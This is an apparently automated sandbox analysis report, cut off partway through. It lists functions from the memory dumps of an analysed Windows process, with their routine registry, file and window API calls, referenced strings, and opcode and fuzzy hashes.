Instruction ID: 5c887d05631a9ac41c9f00d23c65e0dd69f09361cc4cd1948589aa337c31ba86
Opcode Fuzzy Hash: 956139e0bcacbd0758f03474c05633ec487da009122d916111bd4678b6b15441
Instruction Fuzzy Hash: 95017175B00208ABCB00DF9ADC819DEB7ACEB49314F008166BA14DB241D6349E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004CD3E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(?,80000001,00000000,00000001,00000000,5.5.9 (u),?,?,0050BE1C,5.5.9 (u),?,004CD72A,?,00000000,004CDD07), ref: 004CD410

Strings

5.5.9 (u), xrefs: 004CD3E3, 004CD3FE

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID: 5.5.9 (u)
API String ID: 3702945584-2198436010
Opcode ID: 2a485c7ed2e6600d6055c6bc576379fc608d542bbc74e637267a7ed104391f96
Instruction ID: 98f8c33348f4a68d037adef59a50596c2ecaff5f177f8828242ee9e5f43cbf56
Opcode Fuzzy Hash: 2a485c7ed2e6600d6055c6bc576379fc608d542bbc74e637267a7ed104391f96
Instruction Fuzzy Hash: 28F01776700214BFEB04DA6ADD85F6AB7ECDB48664B00407AFE08DB341DA74ED0186A8

Uniqueness

Uniqueness Score: -1.00%

Function 004DE118, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004DE361,00000000,004DE566,?,00000005,00000000,00000000), ref: 004DE15F

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004DE12D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: 448de2646c1c6d55a11d12f948801722d8188ba2a377d098d4c8378febf04e29
Instruction ID: 83b4fab351944d4948ac6edfbad87f9e26a75af5648e35d8e82f5e6684b56936
Opcode Fuzzy Hash: 448de2646c1c6d55a11d12f948801722d8188ba2a377d098d4c8378febf04e29
Instruction Fuzzy Hash: 2AF0AE31700218ABE714B56B5D52BAF929DDBC4758F10403FB905DB385D979DD01036D

Uniqueness

Uniqueness Score: -1.00%

Function 0042EA94, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,0042EAF8), ref: 0042EAC6

Strings

MS Shell Dlg 2, xrefs: 0042EA95, 0042EA97

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: 40a7df6b1877300fbe6f727ca26aad6b5d6b094b76c2ac120af44f21f87671ee
Instruction ID: 237bdefa9337fd205bb120acb75056f6f03b30abdaa8b8f0a3c36c1784ac65f3
Opcode Fuzzy Hash: 40a7df6b1877300fbe6f727ca26aad6b5d6b094b76c2ac120af44f21f87671ee
Instruction Fuzzy Hash: 60F030763092547BD704EA6E9C81FABBBDCDB88755F01803EBA48C7681DA34DD058379

Uniqueness

Uniqueness Score: -1.00%

Function 00500B48, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,00500BC7), ref: 00500B62

Part of subcall function 00469620: GetCurrentProcessId.KERNEL32(?,00000000,004697AB), ref: 00469641
Part of subcall function 00469620: GlobalAddAtomW.KERNEL32 ref: 00469674
Part of subcall function 00469620: GetCurrentThreadId.KERNEL32 ref: 0046968F
Part of subcall function 00469620: GlobalAddAtomW.KERNEL32 ref: 004696C5
Part of subcall function 00469620: RegisterWindowMessageW.USER32(00000000,00000000,?,00000000,?,00000000,004697AB), ref: 004696DB
Part of subcall function 00469620: GetModuleHandleW.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004697AB), ref: 0046975E

Strings

4YE, xrefs: 00500B75, 00500B7F, 00500B89, 00500B99, 00500BA9

Memory Dump Source

Source File: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$HandleMessageModuleProcessRegisterThreadVersionWindow
String ID: 4YE
API String ID: 3196784325-2985084764
Opcode ID: 0c343c011777c1544bc3da1ade9c0bcf64f6b24ed08a64b045b1ae9c0bcc80fd
Instruction ID: 11284a3849e8803996f1fe13ef72f1f3b95dcbf9b2557e9f36140968b95be3d1
Opcode Fuzzy Hash: 0c343c011777c1544bc3da1ade9c0bcf64f6b24ed08a64b045b1ae9c0bcc80fd
Instruction Fuzzy Hash: 6EF0E734214A80AFD605FF26FD6292E77E4F7447097A18476F900436B2EAB9AC11DB89

Uniqueness

Uniqueness Score: -1.00%

Function 004CD45C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(?,NoModify,00000000,00000004,80000001,00000004,00000001,?,004CDB0C,?,0050BE00,004CE168,?,0050BE00,004CE168), ref: 004CD46F

Strings

NoModify, xrefs: 004CD46D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID: NoModify
API String ID: 3702945584-1699962838
Opcode ID: f6baa0185534623571d0a53536ce04074720937378fff01bdfe0ca7557ec9eef
Instruction ID: 75619731aa5654617daf20c1b6f7908edfba6018f6eed0fc36840b20fad3ff25
Opcode Fuzzy Hash: f6baa0185534623571d0a53536ce04074720937378fff01bdfe0ca7557ec9eef
Instruction Fuzzy Hash: 66E01AB4604304BEEB04DA55CD4AF6AB7A89B48754F104069BA049B281E674EE00C658

Uniqueness

Uniqueness Score: -1.00%

Function 0047FD20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 0047FD3A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Open
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 71445658-1109908249
Opcode ID: e415bd2220768e8af6e5cac5480c8a33a3be2fcb2cc2fd5fa2f53e739a7e44d1
Instruction ID: fd9ded6d5f70eb0e81e331f2c2859044cc9f18ec4a999d0d4e7199f5a9835539
Opcode Fuzzy Hash: e415bd2220768e8af6e5cac5480c8a33a3be2fcb2cc2fd5fa2f53e739a7e44d1
Instruction Fuzzy Hash: BCD0C97295022DBBDB109A89DC81DFBB79DDB19360F40842AFE0897241C2B8FC518BF4

Uniqueness

Uniqueness Score: -1.00%

Function 004AEA0C, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(000000FF,?,00000000,004AEC36,?,00000000,004AECAA,?,?,?,004B75D0,00000031,004B5D90,004B5D84,00000000,00000000), ref: 004AEC12
FindClose.KERNEL32(000000FF,004AEC3D,004AEC36,?,00000000,004AECAA,?,?,?,004B75D0,00000031,004B5D90,004B5D84,00000000,00000000,00000000), ref: 004AEC30

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 2287b2334cf5731f7c090d4a11a92e42e452962821d2d1356badef497b42b3c3
Instruction ID: 989a3710816763b533bc540e75a098019a20e380c64239cef77bf36aecf21cc6
Opcode Fuzzy Hash: 2287b2334cf5731f7c090d4a11a92e42e452962821d2d1356badef497b42b3c3
Instruction Fuzzy Hash: F381A0709082889FDF21DFA6C4857EEBBB5AF56304F1481ABE86563381C3389F45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0047FDE0, Relevance: 3.1, APIs: 2, Instructions: 127registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 0047FE99
RegCloseKey.ADVAPI32(004FD344,0047FF2C,?,00000000,00000000,00000000,00000000,00000000,0047FF25,?,004FD344,00000008,00000000,00000000,0047FF53), ref: 0047FF1F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum
String ID:
API String ID: 2818636725-0
Opcode ID: 315e72f850aa74a99b53c781141eb8a5a7727bef9415469f7c4ccb1e3f2d20b3
Instruction ID: 300d4faa5a2d63afaa152c03f161005d623c9b265d29373f51aa501fb4638dbf
Opcode Fuzzy Hash: 315e72f850aa74a99b53c781141eb8a5a7727bef9415469f7c4ccb1e3f2d20b3
Instruction Fuzzy Hash: A3417F31A042089FDB11DBA5C981BEFB7B9EB49300F518477E909F7291D778AE04DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00425C80, Relevance: 3.1, APIs: 2, Instructions: 126COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?), ref: 00425D28
CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?), ref: 00425DB6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: 2e8860ad94cbe6b06da031b23563a88317132d7d40d73736365a3b8ad21801ab
Instruction ID: d886172ca38c2f35932a46a5eb0f5a325f8bc4ae031ddc8a8be8c980502e7438
Opcode Fuzzy Hash: 2e8860ad94cbe6b06da031b23563a88317132d7d40d73736365a3b8ad21801ab
Instruction Fuzzy Hash: 7A41CD30B00A25ABDB21DE75E886BAF73E9AF44704F918076E900B7385D678ED418A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0047FAFC, Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,0047FC34,?,004E0678,00000000,00000000), ref: 0047FB38
RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,0047FC34,?,004E0678), ref: 0047FBA8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3952c222326fdbd1c849a4e9494737835ba4abaf571a385d1af7d3bd6b945def
Instruction ID: 7a36ed184defeb1ce017c9a4bd8613152d0ff6d7255023b2078b31953f174b5a
Opcode Fuzzy Hash: 3952c222326fdbd1c849a4e9494737835ba4abaf571a385d1af7d3bd6b945def
Instruction Fuzzy Hash: 9E414E71900119AFDB11DB95C991AEFB3B8FB04704F51847AE805F7280D738AE499BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0047C4DC, Relevance: 3.1, APIs: 2, Instructions: 102COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0047C5B8
SetWindowLongW.USER32 ref: 0047C5C6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 9468270469e0feec7c86800f3f050b332eeb819bcdde524564b8ce0ee2a1d03e
Instruction ID: 0544ea898a551e1a11e9400c7a2959c2b0bb2bd8ff33ff6c69717cd66fc96442
Opcode Fuzzy Hash: 9468270469e0feec7c86800f3f050b332eeb819bcdde524564b8ce0ee2a1d03e
Instruction Fuzzy Hash: F3413E70A04204EFDB10DF69C980A99B7F5EB49314F2186FAF8149B3A2D739AE41CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00475CD8, Relevance: 3.1, APIs: 2, Instructions: 83threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00475DF3
EnumThreadWindows.USER32(00000000,Function_00075C94,?), ref: 00475DF9

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentEnumWindows
String ID:
API String ID: 2396873506-0
Opcode ID: e1ba568b4748bd54d9dae6f77191e13192941e663547b1c7dc0192042840e0fd
Instruction ID: 78db1d5ca89ed4e75a1ec47d96514c47f4be6606423ec87fed2eb823eea2cc00
Opcode Fuzzy Hash: e1ba568b4748bd54d9dae6f77191e13192941e663547b1c7dc0192042840e0fd
Instruction Fuzzy Hash: AE31EC34A01648DFCB51DF99C589B9DB7F5EF44304F6580AAA808AB362D778AF40DB44

Uniqueness

Uniqueness Score: -1.00%

Function 004485C8, Relevance: 3.1, APIs: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045F97C: GetClassInfoW.USER32 ref: 0045FA4C
Part of subcall function 0045F97C: UnregisterClassW.USER32 ref: 0045FA77
Part of subcall function 0045F97C: RegisterClassW.USER32 ref: 0045FA96
Part of subcall function 0045F97C: GetWindowLongW.USER32(00000000,000000F0), ref: 0045FAD2
Part of subcall function 0045F97C: GetWindowLongW.USER32(00000000,000000F4), ref: 0045FAE7
Part of subcall function 0045F97C: SetWindowLongW.USER32 ref: 0045FAFA

SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014,?,?,?,004A676A,00000000,004A6781), ref: 004485F0
SendMessageW.USER32(00000000,00000192,00000001,00000000), ref: 00448614

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClassLong$InfoMessageRegisterSendUnregister
String ID:
API String ID: 3941102255-0
Opcode ID: 358f188d36b6f72e2e7aa43ad1287d7a82b1ea6f1be18e7a88afee833773360f
Instruction ID: fc004faba9f57c35fca83aea12363dfc2cc44bc3ef427258b11d0ab13290aa04
Opcode Fuzzy Hash: 358f188d36b6f72e2e7aa43ad1287d7a82b1ea6f1be18e7a88afee833773360f
Instruction Fuzzy Hash: 33210C703002015BEB40AE69C8C9B9A33A9AF46314F1845BEBD19DF397DA79DC058B69

Uniqueness

Uniqueness Score: -1.00%

Function 00442048, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0044207D
ReleaseDC.USER32 ref: 004420F0

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Release
String ID:
API String ID: 1375353473-0
Opcode ID: 8c12ceea23473aca06985b5407626b9078fa4514834c553a35fa8e78f72c7fe4
Instruction ID: af6df7ee9ccb0daba5e27f96d004ddd3928bd1e427e58d1cf94bfcb9654ad842
Opcode Fuzzy Hash: 8c12ceea23473aca06985b5407626b9078fa4514834c553a35fa8e78f72c7fe4
Instruction Fuzzy Hash: 1611EF34A04248AFEB00DF99C981AEEB7F4EF49704F5140EAF904A7391D778AE01EB14

Uniqueness

Uniqueness Score: -1.00%

Function 004AD4B8, Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 004AD4FA
GetLastError.KERNEL32(00000000,00000000,00000000,004AD520), ref: 004AD502

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastMove
String ID:
API String ID: 55378915-0
Opcode ID: 40dcd38b6126bba2bdf28cbbf49bf5d0dfe94b76dc1c8009f26cad7e8743dce4
Instruction ID: b3bac48d4572646c71f9298e72213bb2c6d0f1a99259b82d27b7b90f86b4c5ed
